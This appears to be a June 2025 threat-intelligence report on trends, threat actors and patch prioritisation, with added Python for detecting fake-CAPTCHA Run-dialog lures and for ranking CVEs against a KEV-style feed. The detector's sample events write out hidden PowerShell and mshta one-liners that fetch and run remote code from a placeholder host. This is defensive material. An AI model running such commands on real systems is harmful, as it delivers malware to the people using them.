Overview
The threat landscape in June 2025 highlights a clear shift: cyber operations are increasingly defined by the exploitation of trust, identity, and user behavior rather than just malware signatures or known vulnerabilities. Adversaries are moving with precision through hybrid cloud environments, capitalizing on the gaps between user expectations, platform design, and defensive assumptions. Rather than relying on traditional payloads, attackers are deploying CAPTCHA lures, deepfake video calls, OAuth abuse, and fake update prompts to gain access through legitimate interaction flows. This month’s activity revealed widespread abuse of services like GitHub, Dropbox, Microsoft Entra, Zoom, and Discord—platforms that enterprises inherently trust. At the same time, SSO misconfigurations, cloud identity abuse, and user fatigue around verification emerged as consistent weak points exploited by attackers.
The operational behavior of threat actors this month suggests an ecosystem designed for stealth, persistence, and scalability. Malware campaigns increasingly deploy fileless execution, PowerShell loaders, certificate abuse, and multi-stage delivery chains, often triggered by seemingly routine user actions. Even well-defended endpoints are being bypassed through CAPTCHA-driven smuggling, clipboard injection, and batch script execution, typically originating from spoofed websites or compromised infrastructure. Meanwhile, modular malware families, including AsyncRAT, EDDIESTEALER, NetSupport, and More_eggs, were observed leveraging fake verification mechanisms and trusted brand impersonation to evade controls. On the mobile and IoT fronts, actors deployed malware such as SparkKitty, Crocodilus, and BADBOX 2.0, exploiting firmware vulnerabilities, default credentials, and accessibility frameworks to maintain persistence and facilitate lateral movement. These tools are not merely opportunistic; they are designed to blend into expected user environments, making detection a post-compromise challenge.
Across geopolitical boundaries, nation-state and state-aligned actors executed highly targeted campaigns with both strategic and disruptive intent. Chinese, Russian, North Korean, and Iranian operations focused on credential theft, espionage, wiper malware, and long-term access, often delivered through tailored phishing campaigns that employed region-specific file formats, impersonation of diplomatic entities, and deepfake-enabled communications. These operations continue to blur the lines between espionage and cybercrime, frequently sharing infrastructure, techniques, or payloads. Notably, threat actors favored cloud-based staging, sandbox evasion, and modular loaders, reflecting the operational agility seen in advanced eCrime groups. Critical infrastructure sectors, including Energy, Finance, Defense, and Telecommunications, remain high-priority targets due to their complex and often fragmented security environments. These campaigns highlight a broader strategic pivot: the intrusion surface is no longer defined by firewalls and endpoints but by identity, operational processes, and trust relationships. To remain resilient, organizations must shift their focus from static controls to dynamic understanding: identity hardening, behavioral telemetry, and secure workflows must take precedence.
Key Trends Identified
- Advanced Credential Theft via Browser Exploitation: Info stealers like EDDIESTEALER bypassed browser encryption to extract cookies, session tokens, and saved credentials, even from inactive browsers, using advanced memory scraping and evasion techniques.
- AI Tool Impersonation for Malware Delivery: Fake installers for AI tools, including ChatGPT and InVideo, were used to distribute ransomware and infostealers, including Lucky_Gh0$t and CyberLock, often through SEO poisoning and social media campaigns.
- Deepfake-Based Social Engineering via Zoom: North Korean threat actors employed real-time deepfake video impersonations of executives during Zoom calls to socially engineer macOS-specific malware deployment, demonstrating a new dimension of trust exploitation.
- Developer-Focused Supply Chain Attacks: Poisoned GitHub repositories, malicious JavaScript templates, and typosquatting in package managers targeted developer workflows and CI/CD environments to enable credential theft and upstream compromise.
- Fake CAPTCHA Smuggling Techniques: Sophisticated phishing campaigns deployed fake CAPTCHA challenges to trick users into executing obfuscated PowerShell or CMD scripts via the Windows Run dialog, enabling memory-resident malware delivery without writing files to disk.
- IoT Device Exploitation at Scale: Botnets like PumaBot exploited Linux-based IoT devices using SSH brute-force attacks, default credentials, and stealth persistence, particularly within manufacturing and surveillance infrastructure.
- Mobile Malware Persistence and Expansion: Mobile malware families like Crocodilus, Godfather, and SparkKitty used accessibility abuse, overlay attacks, and rogue APKs to exfiltrate financial and personal data from Android devices across multiple regions.
- Modular, Fileless Malware Deployment: Adversaries relied on staged PowerShell loaders, LNK file droppers, and in-memory execution—often using steganography, clipboard poisoning, or certificate-stuffed binaries—to evade detection and establish persistent access.
- Wiper Malware in Targeted Espionage: State-aligned actors deployed destructive ‘PathWiper’ malware in targeted Critical infrastructure attacks, using disk-level sabotage alongside espionage to disrupt operations and erase digital evidence.
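The fake CAPTCHA pattern above leaves a recognizable footprint on the endpoint: a script host started by explorer.exe (which is what a Win+R launch looks like to a process-creation sensor) with a one-liner that hides its window, fetches a remote resource and executes it in memory. The following detection logic is an added example, not code from the report; the process-creation events are constructed to resemble Sysmon/EDR records, and the URL uses the reserved .invalid domain.

```python
"""Detection logic for the fake-CAPTCHA / Run-dialog delivery pattern.

Added example (not from the report): the events below are constructed to look
like Sysmon Event ID 1 / EDR process-creation records. A Win+R launch shows up
as a script host whose parent is explorer.exe; the command line the victim
pasted typically carries download-and-execute or obfuscation flags.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line as recorded by the sensor


# Interpreters a pasted one-liner is typically run through.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Each pattern is a tell that a one-liner is hiding, fetching or decoding code.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"-(?:w|win|window|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget|downloadstring)\b", re.I), "download primitive"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "in-memory execution"),
    (re.compile(r"https?://", re.I), "remote URL"),
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> tuple[str, list[str]]:
    """Return (verdict, reasons) for one process-creation event.

    "alert":  a script host spawned by explorer.exe (interactive launch such as
              the Run dialog) with at least one suspicious command-line tell.
    "info":   the same tells under another parent (scheduled task, service);
              worth a look but commonly legitimate automation.
    "benign": anything else.
    """
    if _basename(ev.image) not in SCRIPT_HOSTS:
        return "benign", []
    reasons = [label for rx, label in SUSPICIOUS_PATTERNS if rx.search(ev.command_line)]
    if not reasons:
        return "benign", []
    if _basename(ev.parent_image) == "explorer.exe":
        return "alert", reasons
    return "info", reasons


def run_detection(events: list[ProcessEvent]) -> list[tuple[str, list[str]]]:
    return [classify(ev) for ev in events]


# Constructed sample telemetry (not real captures); the URL uses the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -c "iwr http://example.invalid/verify.txt | iex"'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd /c echo hello"),
    ProcessEvent(r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -ExecutionPolicy Bypass -File C:\ops\backup.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta http://example.invalid/c.hta"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 "notepad.exe"),
]

if __name__ == "__main__":
    for ev, (verdict, reasons) in zip(SAMPLE_EVENTS, run_detection(SAMPLE_EVENTS)):
        print(f"{verdict:6} {_basename(ev.image):16} {', '.join(reasons) or '-'}")
```

The parent-process condition is what separates this pattern from ordinary automation: the same flags under services.exe or a scheduler are downgraded to "info" rather than suppressed, because a human pasting into the Run dialog is the behaviour the lure depends on. On a host where an alert fires, the RunMRU key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU records what was typed into the Run dialog and corroborates the process event.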
Industries Targeted
- Defense & Government: BlueNoroff, Kimsuky, UNC6293, and other state-aligned APTs conducted espionage campaigns against diplomatic, defense, and infrastructure targets using deepfakes, region-specific loaders, and wiper malware like PathWiper.
- Financial Sector: EDDIESTEALER, Crocodilus, and Lucky_Gh0$t were deployed via phishing lures, CAPTCHA smuggling, and mobile overlays to steal banking credentials, cryptocurrency wallets, and corporate access tokens.
- Healthcare: Open WebUI exploitation, GitHub-hosted malware, and AI-generated Python scripts were used to deliver infostealers and crypto miners across exposed clinical systems lacking runtime threat monitoring.
- Manufacturing & Industrial IoT: PumaBot and Flodrix exploited firmware vulnerabilities and default credentials in IoT infrastructure, particularly surveillance systems and traffic camera networks, to deploy miners and build proxy botnets.
- Technology & SaaS: OAuth abuse, SSO manipulation, and cloud-native persistence techniques were used to exploit misconfigurations in Microsoft Entra, AWS, and iOS provisioning flows, targeting backend integrations and user trust paths.
Most Active Threat Actors
- BlueNoroff (North Korea): Used deepfake video impersonation during live Zoom calls to socially engineer the delivery of macOS malware to enterprise targets in the Legal and Technology sectors.
- Crocodilus Operator (eCrime): Expanded Android trojan operations across Europe and South America, targeting Banking and Cryptocurrency users with overlay attacks and fake contact injections to bypass fraud detection.
- EDDIESTEALER Operator (eCrime): Delivered Rust-based infostealers through fake CAPTCHA pages to infiltrate financial and crypto-focused organizations, extracting browser credentials, tokens, and wallet data.
- FIN6 / Storm-0408 (eCrime): Distributed NetSupport RAT through fake Gitcode and DocuSign websites, targeting software development and B2B tech firms with clipboard poisoning and staged PowerShell loaders.
- Kimsuky (North Korea): Deployed region-specific malware loaders targeting diplomatic and defense entities across South Korea and Southeast Asia, using language-specific lures to evade conventional scanners.
- Scattered Spider (eCrime): Continued multi-industry attacks against Finance, Hospitality, and Telecom firms using vishing, MFA fatigue, and credential harvesting, followed by ransomware deployment via the DragonForce RaaS platform.
- UNC6293 (Russia-aligned): Conducted espionage campaigns against Critical infrastructure and Government agencies in Eastern Europe using modular backdoors and sandbox evasion to maintain long-term persistence.
Vulnerability Asset Management
June 2025 Threat Landscape: Shadow Risk, ICS Vulnerabilities, and the Danger of Delayed Patching
June 2025 marked a pivotal moment in the evolving threat landscape, as CISA added 19 actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog and issued multiple alerts involving enterprise platforms critical to daily operations. From remote management software and business collaboration tools to legacy ICS devices, CISA's KEV additions highlight a disturbing trend: attackers have shifted focus from opportunistic targets to capitalizing on "shadow risks"—unpatched, high-value systems with elevated privileges, limited patch visibility, and frequent internet exposure.
Enterprise software powering critical operations often lacks automated update mechanisms and falls outside standard vulnerability management workflows, creating persistent blind spots that attackers increasingly exploit. These "shadow infrastructure" components—from JetBrains TeamCity and Ivanti Connect Secure to Zimbra Collaboration Suite—serve as force multipliers for lateral movement once compromised.
Compounding this enterprise software trend, CISA issued over 35 ICS advisories in June, affecting major vendors like Siemens and Schneider Electric, with several years-old CVEs resurfacing in active exploitation campaigns. This pattern highlights how attackers exploit patch fatigue and the false sense of security that often surrounds legacy vulnerabilities, while the surge in ICS vulnerabilities exposes the myth of air-gapped operational technology. Traditional CVSS-based prioritization models have proven inadequate in this context, as they often overlook the threat intelligence that guides real-world attack behavior.
This month's threat landscape calls for urgent attention to visibility, prioritization, and targeted remediation across all environments. Based on these observations, here are some recommendations to help address any security gaps that may exist in your environment:
- Shadow Risk in Enterprise Tools:
  - Prioritize threat-informed patching over traditional CVSS-based models.
  - Use CISA’s KEV Catalog to drive risk-based remediation planning.
- Surge in ICS Vulnerability Disclosures:
  - Implement continuous asset discovery in OT environments to enhance security and operational efficiency.
  - Coordinate with vendors on structured vulnerability disclosure and patch response plans to ensure effective management of security risks.
- Delayed Patching Remains a Key Threat Vector:
  - Don’t assume older CVEs are lower risk—exploit activity proves otherwise.
  - Establish accountability for remediating long-standing vulnerabilities.
- Remote Access and Middleware Under Fire:
  - Enforce multi-layered monitoring, MFA, and privilege controls on RMM tools.
  - Validate patching and hardening of middleware and integration layers, especially at IT-OT boundaries.
Organizations must evolve their vulnerability management practices beyond static scoring models to account for attacker behavior, asset exposure, and real-time exploit intelligence.
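The recommendations above amount to one rule: rank findings by evidence of exploitation and exposure before CVSS. The script below is an added example, not code or data from the report, showing how that looks in practice. It cross-references a scanner's findings against a KEV-style feed; the feed excerpt uses the field names of the CISA KEV JSON but its entries, CVE IDs (CVE-0000-xxxx), vendors and dates are constructed placeholders, the asset inventory is constructed, and the scoring weights are assumptions chosen so that KEV membership outweighs anything a CVSS base score can contribute.

```python
"""KEV-driven remediation ranking, added as an example (not from the report).

KEV_SAMPLE is constructed with the same field names the CISA KEV JSON feed
uses; the CVE IDs, vendors and dates are placeholders, not real entries.
The scoring weights are assumptions for illustration, not a published model.
"""
import json
from datetime import date

# Assumed assessment date for the worked example.
REPORT_DATE = date(2025, 6, 30)

KEV_SAMPLE = json.dumps({
    "title": "constructed KEV excerpt",
    "vulnerabilities": [
        {"cveID": "CVE-0000-1001", "vendorProject": "ExampleVendor",
         "product": "Build Server", "vulnerabilityName": "placeholder",
         "dateAdded": "2025-06-10", "dueDate": "2025-07-01",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-0000-1003", "vendorProject": "ExamplePLC",
         "product": "HMI Panel", "vulnerabilityName": "placeholder",
         "dateAdded": "2022-03-15", "dueDate": "2022-04-05",
         "knownRansomwareCampaignUse": "Known"},
    ],
})

# Constructed scanner findings: one row per (asset, CVE).
INVENTORY = [
    {"asset": "build-01",  "cve": "CVE-0000-1001", "cvss": 7.2, "internet_exposed": True,  "privileged": True},
    {"asset": "vpn-gw-02", "cve": "CVE-0000-1002", "cvss": 9.8, "internet_exposed": True,  "privileged": True},
    {"asset": "hmi-07",    "cve": "CVE-0000-1003", "cvss": 5.3, "internet_exposed": False, "privileged": True},
    {"asset": "wiki-03",   "cve": "CVE-0000-1004", "cvss": 6.5, "internet_exposed": True,  "privileged": False},
]


def load_kev(raw_json: str) -> dict[str, dict]:
    """Index a KEV feed by CVE ID."""
    return {v["cveID"]: v for v in json.loads(raw_json)["vulnerabilities"]}


def priority_score(finding: dict, kev: dict[str, dict], today: date = REPORT_DATE) -> float:
    """Score by evidence of exploitation first, exposure second, CVSS last.

    Assumed weights: KEV membership (+20) dominates the 0-10 CVSS range;
    known ransomware use (+5) and a missed KEV due date (+5) add urgency;
    internet exposure (+3) and privilege (+2) break ties within a band.
    """
    score = finding["cvss"]
    entry = kev.get(finding["cve"])
    if entry is not None:
        score += 20.0
        if entry.get("knownRansomwareCampaignUse") == "Known":
            score += 5.0
        if date.fromisoformat(entry["dueDate"]) <= today:
            score += 5.0   # past the due date: the "old CVE, still exploited" case
    if finding["internet_exposed"]:
        score += 3.0
    if finding["privileged"]:
        score += 2.0
    return round(score, 1)


def prioritize(inventory: list[dict], kev: dict[str, dict], today: date = REPORT_DATE) -> list[dict]:
    """Return findings ordered for remediation, highest priority first."""
    ranked = []
    for f in inventory:
        entry = kev.get(f["cve"])
        if entry is not None:
            tier = "P1-KEV"
        elif f["internet_exposed"] and f["cvss"] >= 7.0:
            tier = "P2-exposed"
        else:
            tier = "P3"
        ranked.append({**f, "score": priority_score(f, kev, today), "tier": tier,
                       "kev_due": entry["dueDate"] if entry else None})
    return sorted(ranked, key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for r in prioritize(INVENTORY, load_kev(KEV_SAMPLE)):
        print(f'{r["tier"]:11} {r["asset"]:10} {r["cve"]}  cvss={r["cvss"]}  score={r["score"]}  due={r["kev_due"]}')
```

Run as written, the years-old KEV entry on the HMI (CVSS 5.3, past its due date, known ransomware use) lands at the top, and the non-KEV CVSS 9.8 finding on the VPN gateway drops to third; a pure CVSS sort would have inverted that order. Swapping KEV_SAMPLE for the live feed and INVENTORY for a scanner export is the only change needed for real use.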
Hunter Insights
The threat landscape in June 2025 represents a fundamental paradigm shift from traditional attack vectors toward sophisticated trust exploitation, signaling that adversaries have successfully weaponized identity systems and human verification processes. The convergence of deepfake technology in live video communications, CAPTCHA-based malware smuggling, and fileless execution chains demonstrates threat actors' strategic pivot toward post-perimeter attack methodologies that exploit the weakest link in modern security architectures: user behavior and institutional trust relationships.
Hunter Strategy anticipates a significant escalation in AI-powered social engineering campaigns over the next 6-12 months, particularly deepfake impersonation targeting C-suite executives during critical business communications, alongside an increase in the abuse of legitimate cloud services for malware staging and command-and-control operations. Organizations should immediately prioritize zero-trust identity verification, behavioral analytics for cloud resource access, and user education focused on verification protocols for video communications and software updates. The blurring of nation-state and eCrime TTPs observed this month will accelerate, with state-aligned actors increasingly adopting cybercriminal infrastructure and techniques to complicate attribution while maintaining plausible deniability—necessitating defense strategies that focus on behavioral indicators rather than traditional threat actor profiling.